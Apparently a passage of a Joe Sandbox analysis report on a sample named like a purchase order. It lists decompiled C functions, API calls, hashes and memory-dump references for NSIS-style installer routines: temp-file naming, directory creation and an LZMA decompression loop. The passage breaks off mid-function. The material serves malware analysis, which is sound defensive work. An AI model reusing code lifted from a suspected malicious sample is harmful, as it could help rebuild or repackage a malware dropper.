                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: ('B$Call
                                                                                      • API String ID: 3356406503-2122505255
                                                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                      				intOrPtr _v8;
                                                                                      				short _v12;
                                                                                      				short _t12;
                                                                                      				intOrPtr _t13;
                                                                                      				signed int _t14;
                                                                                      				WCHAR* _t17;
                                                                                      				signed int _t19;
                                                                                      				signed short _t23;
                                                                                      				WCHAR* _t26;
                                                                                      
                                                                                      				_t26 = _a4;
                                                                                      				_t23 = 0x64;
                                                                                      				while(1) {
                                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                                      					_t23 = _t23 - 1;
                                                                                      					_v12 = _t12;
                                                                                      					_t13 =  *0x40a5ac; // 0x61
                                                                                      					_v8 = _t13;
                                                                                      					_t14 = GetTickCount();
                                                                                      					_t19 = 0x1a;
                                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                      					if(_t17 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					if(_t23 != 0) {
                                                                                      						continue;
                                                                                      					} else {
                                                                                      						 *_t26 =  *_t26 & _t23;
                                                                                      					}
                                                                                      					L4:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = _t26;
                                                                                      				goto L4;
                                                                                      			}












                                                                                      0x0040618d
                                                                                      0x00406193
                                                                                      0x00406194
                                                                                      0x00406194
                                                                                      0x00406199
                                                                                      0x0040619a
                                                                                      0x0040619d
                                                                                      0x004061a2
                                                                                      0x004061a5
                                                                                      0x004061af
                                                                                      0x004061bc
                                                                                      0x004061c0
                                                                                      0x004061c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004061cc
                                                                                      0x00000000
                                                                                      0x004061ce
                                                                                      0x004061ce
                                                                                      0x004061ce
                                                                                      0x004061d1
                                                                                      0x004061d4
                                                                                      0x004061d4
                                                                                      0x004061d7
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 004061A5
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-944333549
                                                                                      • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                      • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                      • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                      • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                                      				void* _t17;
                                                                                      				int _t23;
                                                                                      				void* _t25;
                                                                                      				signed char _t26;
                                                                                      				short _t28;
                                                                                      				short _t31;
                                                                                      				short* _t34;
                                                                                      				void* _t36;
                                                                                      
                                                                                      				_t28 = __ebx;
                                                                                      				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                      				_t17 = E00405FE2(_t16);
                                                                                      				_t32 = _t17;
                                                                                      				if(_t17 != __ebx) {
                                                                                      					do {
                                                                                      						_t34 = E00405F64(_t32, 0x5c);
                                                                                      						_t31 =  *_t34;
                                                                                      						 *_t34 = _t28;
                                                                                      						if(_t31 != _t28) {
                                                                                      							L5:
                                                                                      							_t25 = E00405C16( *(_t36 + 8));
                                                                                      						} else {
                                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                      							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                                      								goto L5;
                                                                                      							} else {
                                                                                      								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                                                      							}
                                                                                      						}
                                                                                      						if(_t25 != _t28) {
                                                                                      							if(_t25 != 0xb7) {
                                                                                      								L9:
                                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      							} else {
                                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						 *_t34 = _t31;
                                                                                      						_t32 = _t34 + 2;
                                                                                      					} while (_t31 != _t28);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                      					_push(0xfffffff5);
                                                                                      					E00401423();
                                                                                      				} else {
                                                                                      					E00401423(0xffffffe6);
                                                                                      					E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                      					if(_t23 == 0) {
                                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x004015c1
                                                                                      0x004015c9
                                                                                      0x004015cc
                                                                                      0x004015d1
                                                                                      0x004015d5
                                                                                      0x004015d7
                                                                                      0x004015df
                                                                                      0x004015e1
                                                                                      0x004015e4
                                                                                      0x004015ea
                                                                                      0x00401604
                                                                                      0x00401607
                                                                                      0x004015ec
                                                                                      0x004015ec
                                                                                      0x004015ef
                                                                                      0x00000000
                                                                                      0x004015fa
                                                                                      0x004015fd
                                                                                      0x004015fd
                                                                                      0x004015ef
                                                                                      0x0040160e
                                                                                      0x00401615
                                                                                      0x00401624
                                                                                      0x00401624
                                                                                      0x00401617
                                                                                      0x0040161a
                                                                                      0x00401622
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401622
                                                                                      0x00401615
                                                                                      0x00401627
                                                                                      0x0040162b
                                                                                      0x0040162c
                                                                                      0x004015d7
                                                                                      0x00401634
                                                                                      0x00401663
                                                                                      0x004022f1
                                                                                      0x00401636
                                                                                      0x00401638
                                                                                      0x00401645
                                                                                      0x0040164d
                                                                                      0x00401655
                                                                                      0x0040165b
                                                                                      0x0040165b
                                                                                      0x00401655
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                        • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4pu.pu,?,75702EE0,00405D94,?,75703420,75702EE0,00000000), ref: 00405FF0
                                                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                                      • API String ID: 1892508949-670666241
                                                                                      • Opcode ID: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                                                      • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                      • Opcode Fuzzy Hash: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                                                      • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 99%
                                                                                      			E00407194() {
                                                                                      				signed int _t530;
                                                                                      				void _t537;
                                                                                      				signed int _t538;
                                                                                      				signed int _t539;
                                                                                      				unsigned short _t569;
                                                                                      				signed int _t579;
                                                                                      				signed int _t607;
                                                                                      				void* _t627;
                                                                                      				signed int _t628;
                                                                                      				signed int _t635;
                                                                                      				signed int* _t643;
                                                                                      				void* _t644;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					_t530 =  *(_t644 - 0x30);
                                                                                      					if(_t530 >= 4) {
                                                                                      					}
                                                                                      					 *(_t644 - 0x40) = 6;
                                                                                      					 *(_t644 - 0x7c) = 0x19;
                                                                                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                      					while(1) {
                                                                                      						L145:
                                                                                      						 *(_t644 - 0x50) = 1;
                                                                                      						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                      						while(1) {
                                                                                      							L149:
                                                                                      							if( *(_t644 - 0x48) <= 0) {
                                                                                      								goto L155;
                                                                                      							}
                                                                                      							L150:
                                                                                      							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                      							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                      							 *(_t644 - 0x54) = _t643;
                                                                                      							_t569 =  *_t643;
                                                                                      							_t635 = _t569 & 0x0000ffff;
                                                                                      							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                      							if( *(_t644 - 0xc) >= _t607) {
                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                      								_t628 = _t627 + 1;
                                                                                      								 *_t643 = _t569 - (_t569 >> 5);
                                                                                      								 *(_t644 - 0x50) = _t628;
                                                                                      							} else {
                                                                                      								 *(_t644 - 0x10) = _t607;
                                                                                      								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                      								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                      							}
                                                                                      							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                      								L148:
                                                                                      								_t487 = _t644 - 0x48;
                                                                                      								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                      								L149:
                                                                                      								if( *(_t644 - 0x48) <= 0) {
                                                                                      									goto L155;
                                                                                      								}
                                                                                      								goto L150;
                                                                                      							} else {
                                                                                      								L154:
                                                                                      								L146:
                                                                                      								if( *(_t644 - 0x6c) == 0) {
                                                                                      									L169:
                                                                                      									 *(_t644 - 0x88) = 0x18;
                                                                                      									L170:
                                                                                      									_t579 = 0x22;
                                                                                      									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                      									_t539 = 0;
                                                                                      									L172:
                                                                                      									return _t539;
                                                                                      								}
                                                                                      								L147:
                                                                                      								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                      								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      								_t484 = _t644 - 0x70;
                                                                                      								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                      								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                      								goto L148;
                                                                                      							}
                                                                                      							L155:
                                                                                      							_t537 =  *(_t644 - 0x7c);
                                                                                      							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                      							while(1) {
                                                                                      								L140:
                                                                                      								 *(_t644 - 0x88) = _t537;
                                                                                      								while(1) {
                                                                                      									L1:
                                                                                      									_t538 =  *(_t644 - 0x88);
                                                                                      									if(_t538 > 0x1c) {
                                                                                      										break;
                                                                                      									}
                                                                                      									L2:
                                                                                      									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                                      										case 0:
                                                                                      											L3:
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L4:
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                      											_t538 =  *( *(_t644 - 0x70));
                                                                                      											if(_t538 > 0xe1) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											L5:
                                                                                      											_t542 = _t538 & 0x000000ff;
                                                                                      											_push(0x2d);
                                                                                      											asm("cdq");
                                                                                      											_pop(_t581);
                                                                                      											_push(9);
                                                                                      											_pop(_t582);
                                                                                      											_t638 = _t542 / _t581;
                                                                                      											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                      											asm("cdq");
                                                                                      											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                      											 *(_t644 - 0x3c) = _t633;
                                                                                      											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                      											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                      											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                      											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                      												L10:
                                                                                      												if(_t641 == 0) {
                                                                                      													L12:
                                                                                      													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                      													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													goto L11;
                                                                                      												}
                                                                                      												do {
                                                                                      													L11:
                                                                                      													_t641 = _t641 - 1;
                                                                                      													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                      												} while (_t641 != 0);
                                                                                      												goto L12;
                                                                                      											}
                                                                                      											L6:
                                                                                      											if( *(_t644 - 4) != 0) {
                                                                                      												GlobalFree( *(_t644 - 4));
                                                                                      											}
                                                                                      											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      											 *(_t644 - 4) = _t538;
                                                                                      											if(_t538 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                      												goto L10;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											L13:
                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												L157:
                                                                                      												 *(_t644 - 0x88) = 1;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L14:
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                      											_t45 = _t644 - 0x48;
                                                                                      											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                      											__eflags =  *_t45;
                                                                                      											L15:
                                                                                      											if( *(_t644 - 0x48) < 4) {
                                                                                      												goto L13;
                                                                                      											}
                                                                                      											L16:
                                                                                      											_t550 =  *(_t644 - 0x40);
                                                                                      											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                      												L20:
                                                                                      												 *(_t644 - 0x48) = 5;
                                                                                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											L17:
                                                                                      											 *(_t644 - 0x74) = _t550;
                                                                                      											if( *(_t644 - 8) != 0) {
                                                                                      												GlobalFree( *(_t644 - 8));
                                                                                      											}
                                                                                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                      											 *(_t644 - 8) = _t538;
                                                                                      											if(_t538 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      										case 2:
                                                                                      											L24:
                                                                                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                      											 *(_t644 - 0x84) = 6;
                                                                                      											 *(_t644 - 0x4c) = _t557;
                                                                                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                      											goto L132;
                                                                                      										case 3:
                                                                                      											L21:
                                                                                      											__eflags =  *(_t644 - 0x6c);
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												L158:
                                                                                      												 *(_t644 - 0x88) = 3;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L22:
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											_t67 = _t644 - 0x70;
                                                                                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                      											__eflags =  *_t67;
                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                      											L23:
                                                                                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                      											if( *(_t644 - 0x48) != 0) {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      											goto L24;
                                                                                      										case 4:
                                                                                      											L133:
                                                                                      											_t559 =  *_t642;
                                                                                      											_t626 = _t559 & 0x0000ffff;
                                                                                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                      											if( *(_t644 - 0xc) >= _t596) {
                                                                                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                      												 *(_t644 - 0x40) = 1;
                                                                                      												_t560 = _t559 - (_t559 >> 5);
                                                                                      												__eflags = _t560;
                                                                                      												 *_t642 = _t560;
                                                                                      											} else {
                                                                                      												 *(_t644 - 0x10) = _t596;
                                                                                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                      											}
                                                                                      											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                      												goto L139;
                                                                                      											} else {
                                                                                      												goto L137;
                                                                                      											}
                                                                                      										case 5:
                                                                                      											L137:
                                                                                      											if( *(_t644 - 0x6c) == 0) {
                                                                                      												L168:
                                                                                      												 *(_t644 - 0x88) = 5;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											L138:
                                                                                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                      											L139:
                                                                                      											_t537 =  *(_t644 - 0x84);
                                                                                      											L140:
                                                                                      											 *(_t644 - 0x88) = _t537;
                                                                                      											goto L1;
                                                                                      										case 6:
                                                                                      											L25:
                                                                                      											__edx = 0;
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												L36:
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											L26:
                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                      											__cl = 8;
                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                      													_t98 = __ebp - 0x38;
                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      													__eflags =  *_t98;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                      												L35:
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												goto L61;
                                                                                      											} else {
                                                                                      												L32:
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 8);
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												goto L41;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											L66:
                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                      												L68:
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                      												__eflags = __eax;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L69;
                                                                                      											}
                                                                                      											L67:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      											goto L132;
                                                                                      										case 8:
                                                                                      											L70:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      											}
                                                                                      											goto L132;
                                                                                      										case 9:
                                                                                      											L73:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												goto L90;
                                                                                      											}
                                                                                      											L74:
                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											L75:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      											__eflags = _t259;
                                                                                      											0 | _t259 = _t259 + _t259 + 9;
